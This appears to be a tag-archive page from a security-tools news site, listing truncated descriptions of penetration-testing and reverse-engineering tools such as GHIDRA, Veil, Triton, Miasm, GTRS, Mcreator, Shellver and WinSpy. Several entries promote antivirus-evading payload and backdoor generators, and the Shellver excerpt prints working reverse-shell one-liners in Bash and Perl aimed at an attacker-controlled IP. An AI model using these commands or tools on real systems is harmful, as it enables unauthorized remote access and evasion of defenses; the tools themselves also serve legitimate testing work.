PRINT
PRINT
SEND MAIL
SEND MAIL

Tag: reverse

Windows10

Black Window 10 v2

  Black Window Enterprise 10 Codename : Polemos Black Window 10 Enterprise is the first windows based penetration testing distribution with Linux integrated ! The system comes activated with a digital license for Windows enterprise! It supports windows apps and Linux apps, GUI and terminal apps! It comes with a tone off hacking tools plus all the tools that are included with the latest release of Cerberus Linux! It has managed to implement Cerberus os within windows. Offers the stability of a windows system…

NEW TOOLS

NSA to release its GHIDRA reverse engineering tool for free

The United States' National Security Agency (NSA) is planning to release its internally developed reverse engineering tool for free at the upcoming RSA security conference 2019 that will be held in March in San Francisco. The existence of the framework, dubbed GHIDRA, was first publicly revealed by WikiLeaks in CIA Vault 7 leaks, but the tool once again came to light after Senior NSA Adviser Robert Joyce announced to publicly release the tool for free in his RSA Conference session description. Reverse engineering tool is a disassembler, for…

Admin Panel FinderCloudFlareCrawlingHackerTargetInformation GatheringNEW TOOLSpenetration testingSiteBrokerweb-application-security

SiteBroker – A Cross-Platform Python Based Utility For Information Gathering And Penetration Testing Automation!

A cross-platform python based utility for information gathering and penetration automation!OutputSitebroker's Full OutputRequirementsPython (2.7.*)Python pipPython module requestsPython module coloramaPython module dnspythonPython module lxmlPython module bs4Install modulespip install -r requirements.txtTested onWindows 7/8/8.1Kali linux (2017.2)Download SiteBrokerYou can download the latest version of SiteBroker by cloning the GitHub repository.git clone The Whole Script Into Python (Previously It Was Written In PHP)Exceptions Covered for both User Interrupting && Internel Issues!Removed NetCraft Module as We need to use selinium and phantomJS for it (Ultimately making script slow!)Changed the…

Antivirus EvasionKaliNEW TOOLSRubyVeilVeil-Evasion

Veil – Tool To Generate Metasploit Payloads That Bypass Common Anti-virus Solutions

Veil is a tool designed to generate metasploit payloads that bypass common anti-virus solutions.Veil is current under support by @ChrisTruncerSoftware Requirements:The following OSs are officially supported:Debian 8+Kali Linux Rolling 2018.1+The following OSs are likely able to run Veil:Arch LinuxBlackArch LinuxDeepin 15+ElementaryFedora 22+Linux MintParrot SecurityUbuntu 15.10+SetupKali's Quick Installapt -y install veil/usr/share/veil/config/setup.sh --force --silentGit's Quick InstallNOTE:Installation must be done with superuser privileges. If you are not using the root account (as default with Kali Linux), prepend commands with sudo or change to the root user before…

Binary AnalysisBinary TranslationInstruction SemanticsNEW TOOLSProgram AnalysisReverse EngineeringSymbolic ExecutionTaint Analysisx86

Triton – Dynamic Binary Analysis (DBA) Framework

Triton is a dynamic binary analysis (DBA) framework. It provides internal components like a Dynamic Symbolic Execution (DSE) engine, a Taint engine, AST representations of the x86 and the x86-64 instructions set semantics, SMT simplification passes, an SMT Solver Interface and, the last but not least, Python bindings.Based on these components, you are able to build program analysis tools, automate reverse engineering and perform software verification. As Triton is still a young project, please, don't blame us if it is not yet reliable. Open…

GTRSMacNEW TOOLSReverse Shell

GTRS – Google Translator Reverse Shell

This tools uses Google Translator as a proxy to send arbitrary commands to an infected machine.[INFECTED MACHINE] ==HTTPS==> [GOOGLE TRANSLATE] ==HTTP==> [C2] Environment ConfigurationFirst you need a VPS and a domain, for the domain you can get a free one on Freenom. With your VPS and domain, just edit the client script, and set your domain on line 5.UsageStart the server.py on your VPSpython2.7 server.pyExecute the client on a computer with access to Google Translator.bash client.shNow you have an interactive shell using named pipe…

Av EvasionMcreatorNEW TOOLSReverse Shell

Mcreator – Encoded Reverse Shell Generator With Techniques To Bypass AV’s

Encoded Reverse Shell Generator With Techniques To Bypass AV'sInstallationgit clone && cd mcreator/ && python mcreator.pyVersionpython 2.7.* can't be lower or higher than 2.7 cause of the """ syntax in scripts.Runnig mcreator consolepython mcreator.py -rsg consoleCommandshttps://github.com/blacknbunny/mcreator/wiki/CommandsReverse Shellshttps://github.com/blacknbunny/mcreator/wiki/Reverse-ShellsTechniqueshttps://github.com/blacknbunny/mcreator/wiki/TechniquesCompilinghttps://github.com/blacknbunny/mcreator/wiki/CompilingAn example to toolhttps://github.com/blacknbunny/mcreator/wiki/An-exampleHelpusage: mcreator.py [-h] [-rsg RSGENERATOR]Reverse Shell generator with techniques to bypass all the AV'soptional arguments: -h, --help show this help message and exit -rsg RSGENERATOR, --rsgenerator RSGENERATOR Reverse Shell Generator With Encryptions & TechniquesDownload Mcreator

ARMAssemblerDisassemblerELFEmulatorIntermediate RepresentationMiasmMIPSNEW TOOLSReverse EngineeringShellcodesSymbolic Execution

Miasm – Reverse Engineering Framework In Python

Miasm is a free and open source (GPLv2) reverse engineering framework. Miasm aims to analyze / modify / generate binary programs. Here is a non exhaustive list of features:Opening / modifying / generating PE / ELF 32 / 64 LE / BE using ElfesteemAssembling / Disassembling X86 / ARM / MIPS / SH4 / MSP430Representing assembly semantic using intermediate languageEmulating using JIT (dynamic code analysis, unpacking, ...)Expression simplification for automatic de-obfuscation...See the official blog for more examples and demos.Basic examplesAssembling / DisassemblingImport Miasm x86…

Cheat SheetHiddenNetcatNEW TOOLSNode.jsPerlPHPRubyShellver

Shellver – Reverse Shell Cheat Sheet Tool

Reverse Shell Cheat Sheet ToolInstall NoteClone the repository:git clone go inside:cd shellver/Then install it:python setup.py -irun shellver -h or "shellver bash or perl {} python {} php {} ruby {} netcat {} xterm {} shell {} all".format (or)Exampleshellver pythonshellver allFrom Shell MethodsReverse Shell Cheat SheetBash TCPbash -i >& /dev/tcp/10.0.0.1/8080 0>&10<&196;exec 196<>/dev/tcp/<your IP>/<same unfiltered port>; sh <&196 >&196 2>&196Bash UDPVictim:sh -i >& /dev/udp/127.0.0.1/4242 0>&1Listener:nc -u -lvp 4242Perlperl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"[IPADDR]:[PORT]");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'NOTE: Windows onlyperl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"[IPADDR]:[PORT]");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'PythonLinux…

IPNEW TOOLSReverse ShellWinSpy

WinSpy – A Windows Reverse Shell Backdoor Creator With An Automatic IP Poisener

WinSpy: Windows Reverse Shell Backdoor Creator With ip poisener.Dependencies1 - metasploit-framework2 - xterm3 - apache24 - whiptailInstallationsudo apt-get install gitgit clone winspychmod +x setup.sh./setup.shchmod +x winspy.sh./winspy.shTested on :BackBox LinuxKali linuxParrot osTutorialContactContact - Belahsan Ouerghi[Email] - tunisianeagles@protonmail.com - TunisianEagles Download Winspy